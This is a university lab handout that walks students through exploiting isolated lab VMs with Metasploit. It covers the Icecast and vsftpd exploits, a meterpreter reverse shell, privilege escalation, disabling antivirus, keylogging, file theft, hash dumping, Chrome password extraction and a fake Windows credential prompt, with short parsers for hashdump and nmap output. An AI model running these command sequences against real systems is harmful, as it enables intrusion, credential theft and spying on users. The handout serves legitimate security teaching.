Lab – Exploitation

See here for instructions on setting up VirtualBox for this class.

Heads up! Be sure that you have created the infosec-net VirtualBox network, as specified at the top of the above link, before importing the VM! It's not the end of the world if you don't, but it does require some extra work.

This lab uses the following VMs:

In this lab you will use Metasploit and the Nessus vulnerability report from the previous lab to exploit and take control of a Windows 10 VM and the Metasploitable VM you scanned in the previous lab.

Metasploit

Metasploit is the industry’s most popular exploitation tool. According to Sectools.org:

Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality.

Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less).

Metasploit Interfaces

The Metasploit framework has a variety of different interfaces, including the command line tool msfcli and meterpreter, an interface designed to interact with compromised computers. You can even work from an interactive Ruby interpreter within Metasploit (Metasploit is written in Ruby). However, the most popular interface, and the one we will use chiefly in this lab, is msfconsole. Msfconsole is an interactive environment that allows you to scan hosts, test and launch exploits, and build and deploy payloads.

Terminology

Below is a list of common terminology relating to Metasploit, taken (with some adaptation) from Metasploit: The Penetration Tester’s Guide, by Kennedy et al.

Exploit
The means by which an attacker takes advantage of a flaw within a system, an application or service. An exploit results in a particular outcome unintended by the original developer. Common exploits include buffer overflows, web application vulnerabilities (like SQL injection), and configuration errors.
Payload
Code that the attacker wants the system to execute and that is selected and delivered by Metasploit. For example, a reverse shell is a payload that creates a connection from the target machine back to the attacker as a command prompt, whereas a bind shell is a payload that “binds” a command prompt to a listening port on the target machine, to which the attacker can then connect. A payload could also be something as simple as a few commands to be executed on the target operating system.
Module
A module in the context of Metasploit is a piece of software that can be used by Metasploit. At times, you may require the use of an exploit module, a software component that conducts the attack. Other times, an auxiliary module may be required to perform an action such as scanning or system enumeration. These interchangeable modules are the core of what makes Metasploit so powerful.
Listener
A component within Metasploit that waits for an incoming connection of some kind. For example, after the target machine has been exploited, it may call the attacking machine over the Internet. The listener handles that connection, waiting on the attacking machine to be contacted by the exploited system.

Common Commands within Msfconsole

help Lists available commands.
show exploits Shows all available exploits in the Metasploit framework. New exploits are constantly being developed and incorporated into the framework.
show auxiliary Shows auxiliary modules within Metasploit framework.
search Searches exploit and auxiliary modules for one or more terms. For those familiar with grep, the search function works the same way.
use [module] Loads a Metasploit module. The back command exits the module.
back Exits the current module.
show options Within a particular module, show options displays the required and optional configurations that the module uses.
show payloads Within a module, show payloads displays all the payloads that are available to use with the module.
show targets Within a module, show targets lists the OS versions that the module can exploit.
info Within a module, info shows additional information about the module.
set/unset Sets or unsets an environment variable used as an option specific to a particular module.
setg/unsetg Sets a global environment variable used as an option that applies across modules.
save Saves the current global options so they are available the next time you run msfconsole.

Get the Windows 10 VM ready

Use the Windows 10 VM for this.

  1. Open Windows Defender and turn off real-time protection. To do this:

    • Double-click the disable-defender.ps1 script which is on the Desktop.
    • Or, manually,
      • click the Windows button on the bottom left of the desktop, search for ‘Defender’, and choose ‘Windows Defender Security Center’
      • click ‘Virus & Threat protection settings’
      • move the ‘Real-time protection’ slider to the left.
  2. Turn off Windows Firewall. Open CMD with administrative privileges by typing in “cmd” in the Windows search field. Right-click the “Command Prompt” icon, and select “Run as administrator.” Once the command prompt opens, enter the following command:

    netsh advfirewall set allprofiles state off
    

Configure Kali Linux VM

  1. Boot your Kali VM, and login as user root and password toor.
  2. Open a terminal and try to ping the IP address of the Windows 10 VM.
  3. Finally, from the Windows 10 VM, ensure that you can ping the Kali VM.

If you are successful in pinging the VMs in both directions, then you are ready to continue the lab. If not, make sure that each VM is connected to the infosec-net network by checking ifconfig on Kali and ipconfig on Windows 10. Also make sure that the firewall is down on Windows 10.

Is your computer dragging when you have both VMs open? Try toning down resources allocated to Kali and Windows 10. Shut down both VMs, and open the VirtualBox manager. For each vm, click "settings", and drop memory down to around 2048 MB. If that doesn't help things, also try dropping number of CPUs.

Start Icecast on Windows 10

Icecast is a media streaming server that was vulnerable to a buffer overflow attack in versions 2.01 and earlier; see the exploit information here. Old versions of Icecast can be found here. For this section of the lab, you will run a vulnerable version of the Icecast server.

  1. On the Windows 10 desktop, right-click the “Icecast2 Win32” icon. Important! Select “Run as administrator,” and click “yes” on the warning message that pops up.
  2. In the Icecast window, click the button “Start server.”

Metasploit Exploit Walkthrough using the Icecast Vulnerability

  1. Boot your Kali VM, and login.
  2. Install two additional packages that you need for this lab by running the following commands in a terminal, one line at a time:

    apt update
    apt install mirage xtightvncviewer
    reboot
    

    Say “yes” to any prompts during the install process.

    If you do not have an internet connection in Kali, try running service networking restart. Failing that, restart Kali via running reboot.
  3. From the terminal, enter:

    service postgresql start
    
  4. From the terminal, enter:

    msfconsole
    

    You should see a “msf >” prompt appear. This is the Metasploit command line.

  5. Scan the Windows 10 VM for vulnerabilities using nmap

    nmap -sV <ip of Windows 10>
    

    Notice that Icecast is running on port 8000. Could there be an exploit for Icecast built into Metasploit? Let’s check!

  6. From the msf > prompt, try:

    search name:icecast
    

    If the output tells you that you are using "slow search", then cancel with ctrl+c, and run the following from the msf > prompt:

    db_rebuild_cache
    

    This will allow you to search for Metasploit exploit and auxiliary modules. It will run in the background. It may take some time before the search cache is ready. You can still use "slow search" meanwhile.

  7. Heyo! In the search output, you should see an exploit related to icecast called exploit/windows/http/icecast_header. Use it:

    use exploit/windows/http/icecast_header
    
    Note: you can press the tab key within Metasploit to complete a module or command name you are typing. This makes entering commands in Metasploit faster. If you push the tab key twice, it will show you all possible completions for the module path you are typing.
  8. Your msfconsole prompt should now look like this:

    msf exploit(icecast_header) >
    

    Indicating that the icecast_header module is loaded.

  9. To get more information about this exploit module, type info. This module has been rated “great,” meaning it is very effective and reliable. Besides providing a better description, the info command shows the targets that the module is effective against, as well as options to set.

  10. To show available options, type show options.

  11. Let’s set the required options. First, we’ll set the remote host:

    set rhost <IP address of your Windows 10 VM>
    

    Type show options again to see that the RHOST variable has been set.

  12. Next, let’s look at available payloads for this exploit:

    show payloads
    
  13. We have a lot of payload options for this module. We’ll use one of the most popular and reliable payloads. Type:

    set payload windows/meterpreter/reverse_tcp
    

    Meterpreter is a shell, like Bash, except evil. This payload will open a reverse TCP connection from the exploited Windows 10 VM back to the Kali VM. This is why it is important that you are able to reach Kali from Windows 10, and Windows 10 from Kali.

  14. Type show options again to see the options that are required for this payload.

  15. To set the local host variable, type

    set lhost <IP address of the Kali machine>
    
    Note: Remember that you can easily check your IP in Unix/Linux by typing ifconfig from within Metasploit. Type `show options` to see that the variable has been set.
  16. With all options set, now it’s time to launch the exploit! Type:

    exploit
    

    (Or equivalently, run, but that’s less fun.)

  17. You should now be presented with the “meterpreter >” prompt. If you see this, then congratulations! You’ve exploited your first remote host.

  18. Laugh maniacally.

    Introspective question: How did it feel to laugh maniacally? Do you comprehend the potency of your newfound power? Did anyone overhear you laughing maniacally?
    Never forget that you are a script kiddie.
  19. Now that we have access, let’s run a few commands to give you an idea of the power of the meterpreter interface.

  20. To see all possible Meterpreter commands, type help.

  21. Type sysinfo to see information about the compromised system.

  22. Type getuid to see the system user you now control.

  23. Because Icecast was “run as administrator”, we can easily become SYSTEM – the Windows equivalent of “root”. Escalate your privileges by typing getsystem. Type getuid again. You should see that you are “NT AUTHORITY\SYSTEM,” which means you have administrator privileges.

  24. Now that you are SYSTEM, laugh again.

  25. With a Meterpreter shell, you have access to a trove of post-exploit modules included in the Metasploit framework that you can run on the victim machine. For instance, type

    run post/windows/manage/killav 
    

    to stop anti-virus processes that might limit our attacks on the machine.

  26. You can execute commands on the victim host from within Meterpreter. For example, type:

    execute -f cmd.exe -c 
    

    This will launch cmd.exe on the victim’s machine. You can hide the command window from being shown on the victim machine by using the -H option.

    The -c option “channelizes” the cmd.exe, which means that meterpreter can continue interacting with it. Notice the message that “Channel 1 was created.”

    Interact with cmd.exe by typing: channel -i 1. Use the dir, cd, and cd .. commands to browse around the file system. Type exit to return to meterpreter.

    Since opening a command prompt is such a common action, you can simply type shell to open a hidden command prompt.
  27. Type screenshot to capture a screenshot of the current GUI. A jpeg file should be saved to /root on your Kali machine. You can view the image from a different shell in Kali by navigating to the directory of the stored image and viewing it with mirage [image name].

  28. Control the Windows GUI.

    From meterpreter, type background or press ctrl+z. This sends the current meterpreter session to the background so you can do more things in the Metasploit console.

    For this, we will use a different payload – the vncinject payload.

    set payload windows/vncinject/reverse_tcp
    

    Type show options. Change the “ViewOnly” option to false

    set ViewOnly false
    

    Run exploit anew.

    A new window will open on Kali Linux that will let you control the Windows VM using the mouse. You are now controlling the Windows user interface! Whatever you do, the logged-in user will see! Try moving a window on the Windows VM. Then, close the VNC window on the Kali VM. Because you closed the VNC window, the exploit terminated.

  29. Let’s recover your meterpreter shell. Run sessions -l to view all running connections. You should see your meterpreter session, along with its id.

    Interact with that session again by running sessions <the id of the session>. Your prompt should change, and you should be engaged with the meterpreter session again.

  30. Start a keylogger on the victim’s computer. Type keyscan_start. Now, from the Windows 10 machine, open Notepad.exe and type some secrets. They are no longer secrets. Back in meterpreter, type keyscan_dump. You should see the text you typed in Notepad. To stop the keylogger, type keyscan_stop.

  31. Steal a file – download a file from Windows 10 to Kali.

    Use Notepad to create a text document on the Desktop of the Windows 10 machine. Put more secrets in it.

    From the meterpreter session, use the cd command within Meterpreter to navigate to the victim desktop. For that, you can either use the Windows path specification, with double back-slashes:

    cd c:\\users\\labuser\\desktop
    

    … or you can use linux path specification:

    cd /Users/labuser/desktop
    

    Now type ls to see what you might pilfer.

    Snag the secrets file.

    download [filename to steal]
    

    The file should now be pilfered, saved to the Kali VM at /root.

  32. Dog gonnit gotta keep those secrets secret! Name your secrets file something memorable, and hide it somewhere in the Windows filesystem.

    The victim’s tricks are no match for meterpreter. Use the search command from within meterpreter to find the secrets file again:

    search -f [name of your secrets file].txt
    

    Got’em.

  33. Annoy the user. First, disable their keyboard and mouse:

    uictl disable all
    

    Then, play a video for them. We’ll use the play_youtube post module. Read about it from within meterpreter:

    info post/multi/manage/play_youtube
    

    From your laptop or whatever, select your favorite annoying youtube video. Note the url of the video – it will include a v=[video id] in it. Copy the video id. For example, one video id is DLzxrzFCyOs. Let’s play this video, setting VID to your video. e.g.:

    run post/multi/manage/play_youtube VID=DLzxrzFCyOs
    

    Switch over to the Windows VM and enjoy the video. Press ctrl-w to close it – oh wait you can’t, you disabled keyboard and UI access. Mwahaha. Enjoy the video some more.

    From meterpreter, reenable ui controls:

    uictl enable all
    
    Not for credit but just for fun: Share on Slack which annoying video you chose. (Remind me to create a Slack channel for this if I have not by the time you do this lab.)
  34. Because you getsystem‘ed earlier, you can obtain the password hashes for the machine by typing hashdump. These hashes can be readily cracked using a password cracker like Hashcat or John the Ripper (covered in the password cracking lab). For now, we’ll use Google to crack the password hash for user labuser.

    Note: hashdump command outputs hashes in the following format:

    username:SID:LANMAN hash:<NTLM hash>:::
    

    For example, in the following hashdump, the NTLM hash is C1F1B7BDB01896908C80A0A67062BF24:

    Frank:1000:3A956F63F23DAC7236077A718CCDF409:C1F1B7BDB01896908C80A0A67062BF24:::
    

    Copy the NTLM hash that you obtain from hashdump for the labuser user. Open a web browser, and visit a site like https://crackstation.net, and let it crank on your hash. This site uses a rainbow table.

    Alternatively, try to crack it on your own using hashcat with -m 1000 (NTLM) and a wordlist like rockyou. Go on, it’s fun!

    Question: What is the NTLM hash of the WDAGUtilityAccount?

    (The WDAGUtilityAccount is the account that Windows Defender runs as. Uncrackable, as far as I know.)

  35. Right now, your meterpreter session is tied to the Icecast process. This means that if Icecast is closed, you lose your shell. Let’s mitigate that threat by migrating to another, more permanent Windows process that is at less risk of being closed down.

    Type ps -S Icecast (note the capital ‘S’ argument and the capital ‘I’ in Icecast) to search for processes with the name “Icecast.” Note the process ID. Next, type getpid to get the process that meterpreter is running in. It should be the same process ID as Icecast. This confirms that you are tied to Icecast.

    Now, run this post module, which by default will spawn a hidden notepad.exe process, and migrate you to it:

    run post/windows/manage/migrate
    

    Now, close the Icecast window. Your meterpreter session should still be running. Persisted.

  36. You may have noticed that web browsers such as Chrome offer to save passwords for you that you enter into websites. Surely those passwords are secure, right? Let’s see!

    1. In the Windows VM, open Chrome and go as if to log in to a website (such as my.cu.edu). For this exercise, do not use your real credentials. Rather, as the username, enter your First and Last name, and for the password, enter anything excepting your real password. Without actually signing in, click the key symbol to the right of the URL bar, and select “Save.” Chrome has now stashed the password in its “secure” (lol) database. Verify this in Chrome by clicking the three vertical dots in the upper right > settings > Passwords. See that your password for the site is obfuscated. Click the eye to attempt to view it. It is password-protected! Don’t bother revealing it. Is it secret? Is it safe? Do you feel comfortable right now?

    2. Relaunch the Icecast server, but this time not as “administrator”. Be sure to press the “Start server” button again.

    3. Background (or exit) your meterpreter session. This will return you to the msfconsole prompt.

      Then, from the msfconsole, re-select (use) the Icecast exploit, and run (i.e., exploit) it again.

      You should now have a new meterpreter session tied to the new, non-admin Icecast process. To confirm, type getsystem – it should error out. You’re just a regular labuser.

    4. From within your shiny new inferior non-admin-tied meterpreter session, run the chrome password-snagging post module:

      run post/windows/gather/enum_chrome
      

      In the output of that command, you should see a line saying Decrypted data saved in: [directory on your kali machine]. Copy that filepath. Open another Kali terminal, and cat that file. You should see the Chrome login that you saved.

      Don't see a "decrypted" line? Double-check to make sure that you actually saved the login to Chrome.
      Chrome postmod crashing and unable to pull the decrypted file? You need to run this module from a meterpreter session that is tied to a non-admin process (such as a session tied to an Icecast server not started as “administrator”), because the Chrome database is encrypted with the logged-in user’s credentials, not SYSTEM’s.

      When do I use the use... set... run pattern versus just run on its own?

      This is an important principle to understand in order to maximize pwnage.

      Postmodules can be run from two possible places:

      1. meterpreter shells (i.e., meterpreter sessions)
      2. msfconsole

      The msfconsole is the master, and the meterpreter shells (or whatever shells) are its slaves.

      From Meterpreter

      If you want to run a postmodule from a meterpreter session, you use the run syntax, with any necessary options specified inline:

      run <postmodule path> option1=value1 option2=value2
      

      … like you did with the play_youtube exploit.

      With this method, you do not need to set the SESSION option, because the session is implicit when you are running the module from within a meterpreter session – it will always just use the session you are currently interacting with.

      From msfconsole

      Alternatively, and sometimes more easily, you can run postmodules from msfconsole, over an already-established session. Doing so requires obtaining a session and then backgrounding it to return to msfconsole.

      The syntax for this method is more verbose, and is a series of commands instead of a single action-packed one. The pattern is:

      use <postmodule> # this arms it
      set session <sessionid> # this is required when running postmods from msfconsole
      set <whatever else, such as we set the VID for the youtube exploit>
      run
      

      This is important to note – when you invoke run from msfconsole, it is equivalent to invoking exploit. You may not add any additional arguments after saying run. If you do say anything extra, it is ignored, and the currently-armed exploit (shown in red in the prompt) will be run.

      With the second method, msfconsole will run the postmod exploit over your already-established session (assuming that you actually already have one that is still valid)

      Summary

      So, again, there are two ways to run postmodules.

      1. From within meterpreter (condensed syntax where everything is specified on one line, starting with run)
      2. From msfconsole (expanded syntax where multiple commands must be invoked to run one postmodule – e.g., use, set, run/exploit)

      The shell_to_meterpreter postmodule for linux boxes, which you will encounter later in this lab, must be run from msfconsole because you cannot run postmodules from a podunk unix shell.

      But really, the podunk unix shell isn’t all that bad. You still have access to upload and download extra functions which are easier than scp.

    Question: Take a screenshot of you running the cat command on the Chrome password loot, including the output of the cat command, showing your login information.

    Example screenshot to submit:

    [example screenshot image]

  37. Prompt the Windows user for their password. From meterpreter, type:

    run post/windows/gather/phish_windows_credentials
    

    On Windows, you should see a legitimate Windows prompt, triggered by powershell code run by meterpreter on the victim machine, asking for the user to enter their password. This prompt will not go away until the user enters their correct password (which, for labuser, is Password1). Enter the password.

    On Kali, in meterpreter, you should see the username and password.

  38. When you’re finished, type exit to close the Meterpreter session. Or, type background (or ctrl+z) if you want to return to it again later.

Part 2: Metasploitable2 Discovery

Take Note! This section attacks Metasploitable2, not the Windows machine! As such, it can be done completely independently of Part 1. You do not need to have exploited Windows in order to do these steps.

Start the Metasploitable2 VM.

  1. Do a wide sweep to check which ports are open on the Metasploitable2 VM:

    nmap -sS 192.168.55.102
    

    And check versions for common ports:

    nmap -sV 192.168.55.102
    

    Versions for all ports:

    nmap -sV -p1-65535 192.168.55.102
    

    Versions for one specific port:

    nmap -sV -p80 192.168.55.102
    
  2. Note that the service “vsftpd” is running on port 21. In Kali, from a msfconsole prompt, search for a vsftpd exploit:

    search vsftpd
    

    Select (use) the exploit, and set any necessary options (show options). Check available payloads:

    show payloads
    

    You will see that a meterpreter shell is not available for this exploit – at least, not initially. Instead you will get a very basic unix shell.

    Run the exploit. You will see a final line saying something along the lines of “Command shell session opened…” followed by… nothing. Did the exploit fail? No! You have a shell, albeit a very basic one.

    Type id to see who you are. Type other familiar commands, such as ls, pwd, and cat [filename]. You do not have tab-completion, sadly. Although you do have a few basic commands. Run:

    help
    

    Notice that you have download and upload commands. This can be useful to steal files without having to use scp. However, you cannot run Metasploit postmodules from within this session. Let’s fix that by upgrading to a meterpreter session.

    1. Background your session. This will return you to the msfconsole prompt.
    2. Select (use) the following postmodule:

      use post/multi/manage/shell_to_meterpreter
      

      This command will use our first shell to upload and initiate a meterpreter shell session.

      Once you have this postmodule selected, type show options. Set the needed options, including the session number of the backgrounded session. Launch (run) the postmodule. A new meterpreter session should be created. Find the session id of this new session (run sessions), and interact with it (sessions [sessionid]).

      Type help again. You now have more meta-commands available than before, including access to postmodules from the shell.

    3. Let’s hashdump metasploitable2. This will give you a list of usernames and password hashes. You can later crack these hashes on Kali.

      From your meterpreter session,

      run post/linux/gather/hashdump
      

      This will print all usernames and hashes to the console. It will also save the information to a file in the /root/.msf4/loot/ folder. Make sure you know how to find this file – you can use it to crack hashes in hashcat or John the Ripper. View the contents of the file in a separate Kali terminal by running cat on it.

      Question: What is the salt and hash for the Postgres user? For example, the salt and hash for the msfadmin user is msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/

      You technically do not have to upgrade to a meterpreter session to run the postmodules. You can alternatively run the postmodules over the basic shell session from the msfconsole. To do so, you would select the postmodule as you would an exploit, point it at the basic shell’s session, and run it:

      use post/linux/gather/hashdump
      show options
      set session [sessionid of basic unix shell]
      run
      

      This will execute the postmodule over the basic shell session.
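The two hashdump formats in this lab (the Windows `username:SID:LM hash:NTLM hash:::` lines from step 34 of Part 1, and the Linux `username:$id$salt$hash` lines from the Metasploitable2 hashdump above) are easy to misread by eye. The following Python parser is an added example, not part of the lab or of Metasploit; it splits both formats into their fields and flags the things a defender reviewing such a dump would care about: an LM hash that is not the “empty” sentinel (legacy LM hashing still enabled), an NTLM hash of the empty password, and md5crypt (`$1$`) hashes that modern Linux distributions have replaced with sha512crypt or yescrypt. The sample dump is constructed from the two example lines on this page plus one constructed Guest line; no real hashes from any system are included.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Windows hashdump line: username:RID:LM hash:NTLM hash:::
# (the lab calls the second field the SID; it is the account's numeric RID.)
WIN_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")
# Linux shadow-style line: username:$id$salt$hash[:optional extra fields]
LINUX_LINE = re.compile(r"^([^:]+):\$([^$]+)\$([^$]+)\$([^:$]+)(?::.*)?$")

# Well-known sentinel values (standard constants, not taken from any live system).
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"    # "no LM hash stored"
NTLM_EMPTY = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NTLM of the empty password

# Modular crypt format identifiers used by glibc/libxcrypt.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


@dataclass
class HashEntry:
    username: str
    kind: str                    # "ntlm" or a crypt scheme name
    salt: Optional[str]          # None for NTLM, which is unsalted
    digest: str
    notes: List[str] = field(default_factory=list)


def parse_hashdump_line(line: str) -> Optional[HashEntry]:
    """Parse one Windows or Linux hashdump line; return None for non-hash lines."""
    line = line.strip()
    m = WIN_LINE.match(line)
    if m:
        user, _rid, lm, ntlm = m.groups()
        notes = []
        if lm.lower() != LM_EMPTY:
            notes.append("LM hash present: legacy LM hashing is enabled on this host")
        if ntlm.lower() == NTLM_EMPTY:
            notes.append("NTLM hash of the empty string: account has no password")
        return HashEntry(user, "ntlm", None, ntlm.lower(), notes)
    m = LINUX_LINE.match(line)
    if m:
        user, cid, salt, digest = m.groups()
        kind = CRYPT_IDS.get(cid, f"crypt-id-{cid}")
        notes = []
        if cid == "1":
            notes.append("md5crypt is cheap to brute-force; migrate to sha512crypt or yescrypt")
        return HashEntry(user, kind, salt, digest, notes)
    return None


def parse_hashdump(text: str) -> List[HashEntry]:
    """Parse a whole dump, silently skipping banners and blank lines."""
    return [e for e in (parse_hashdump_line(l) for l in text.splitlines()) if e]


# Constructed sample: the two example lines from this page plus a constructed
# Guest line using only the public sentinel constants above.
SAMPLE_DUMP = """\
[*] Dumping password hashes...
Frank:1000:3A956F63F23DAC7236077A718CCDF409:C1F1B7BDB01896908C80A0A67062BF24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/
"""

if __name__ == "__main__":
    for entry in parse_hashdump(SAMPLE_DUMP):
        print(f"{entry.username:10} {entry.kind:12} salt={entry.salt} digest={entry.digest}")
        for note in entry.notes:
            print(f"           ! {note}")
```

Running it on the sample prints one line per account; for the Frank line it reports the NTLM digest `c1f1b7bdb01896908c80a0a67062bf24` and warns that an LM hash is also present, and for msfadmin it separates the salt `XN10Zj2c` from the digest so you can answer the Postgres-user question in the same form.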

Exploitation Exploration

Recall that the general strategy for exploitation requires:

  1. Service enumeration and version recon
  2. Exploit identification

If you run nmap against metasploitable2, you will get a long list of running services. If you include the -sV flag, you will get some version information. However, the nmap version probes can only gain so much insight. Some services require you to use other methods to do version recon, such as connecting to the service using an application that speaks the service protocol (e.g., using HexChat to connect to the IRC service and reading its banner).
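To make the version-recon step less error-prone, here is an added Python example (not part of the lab, and not an nmap or Metasploit feature) that parses the port table of nmap’s normal -sV output, separates open ports from closed ones, lists the open services for which nmap returned no version string (the ones the paragraph above says need manual recon), and turns a version banner into the `search name:… type:exploit` query form used later in this section. The sample scan text is constructed for this example; the version strings in it are illustrative, not a record of a real scan.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One port line of nmap's normal output, e.g.
#   "21/tcp   open  ftp         vsftpd 2.3.4"
# The VERSION column is optional: nmap leaves it blank when no probe matched.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: Optional[str]   # None when nmap printed no version


def parse_nmap_sv(text: str) -> List[Service]:
    """Extract the port table from nmap normal output; header/banner lines are skipped."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            services.append(Service(int(m["port"]), m["proto"], m["state"],
                                    m["service"], m["version"]))
    return services


def open_services(services: List[Service]) -> List[Service]:
    return [s for s in services if s.state == "open"]


def needs_manual_recon(services: List[Service]) -> List[Service]:
    """Open ports where -sV gave no version: candidates for banner-grabbing by hand."""
    return [s for s in open_services(services) if not s.version]


def search_query(service: Service) -> str:
    """Build the msfconsole query in the form this section uses:
    'search name:<first word> <other words> type:exploit'.
    Parenthetical detail such as '(Ruby 1.8; path ...)' is dropped, and the
    service name is used when nmap reported no version at all."""
    banner = (service.version or service.name).split("(")[0]
    tokens = [t.lower() for t in banner.split()]
    parts = ["search", "name:" + tokens[0], *tokens[1:], "type:exploit"]
    return " ".join(parts)


# Constructed sample nmap -sV output (illustrative values only).
SAMPLE_NMAP = """\
Nmap scan report for 192.168.55.102
PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         vsftpd 2.3.4
22/tcp   open   ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
25/tcp   closed smtp
6667/tcp open   irc
8787/tcp open   drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
"""

if __name__ == "__main__":
    svcs = parse_nmap_sv(SAMPLE_NMAP)
    for s in open_services(svcs):
        print(f"{s.port}/{s.proto} {s.name:10} {s.version or '<no version>'}")
        print(f"    {search_query(s)}")
    print("needs manual recon:", [s.port for s in needs_manual_recon(svcs)])
```

On the sample, the irc line on port 6667 is the one reported as needing manual recon (nmap printed no version for it), and the DRb line produces exactly the refined query shown below, `search name:ruby drb rmi type:exploit`.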

You can use what you know about the running service, including its name, to search for exploits. Metasploit’s built-in search functionality is a bit cumbersome and obtuse, and many prefer to install exploitdb to get access to the searchsploit command, which has more intuitive search functionality and nicer reporting and which includes non-metasploit exploits as well (any available on exploit-db.com). But you should be able to get by with the basic metasploit search functionality with some trial-and-error and deductive reasoning.

For instance, if nmap -sV reported that a service called Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb) was running on port 8787, and you wanted to search for an exploit for it, you might use the following search in msfconsole:

search ruby drb rmi

This would return a lot of results! Enter search to see how we might refine our query. The help docs report that we can filter by type: and also by name: (where the default is to just search by keyword, where the term can appear anywhere in the exploit file).

So, filter down to just exploits:

search ruby drb rmi type:exploit

That’s still a lot of results! A lot of the exploits are written in Ruby, so let’s narrow that term to only search the name:

search name:ruby drb rmi type:exploit

Just two results now. We can work with that. If you googled for what ruby DRb represents, you would see that the DRb stands for “distributed”. This would help you pick which of the two exploits to try first.

And of course, you can always google version names along with the term “exploit” to see what comes up.

Now, exploit three additional services.

Exploit the following additional service

Exploit two more additional services from the following list

Part 2 Deliverable

For each of the three additional exploits, take one screenshot showing:

Example – Screenshot 1 out of 3:

[example screenshot image]

...and two more screenshots!

Question: Take a screenshot for each of the three above successful exploits you performed.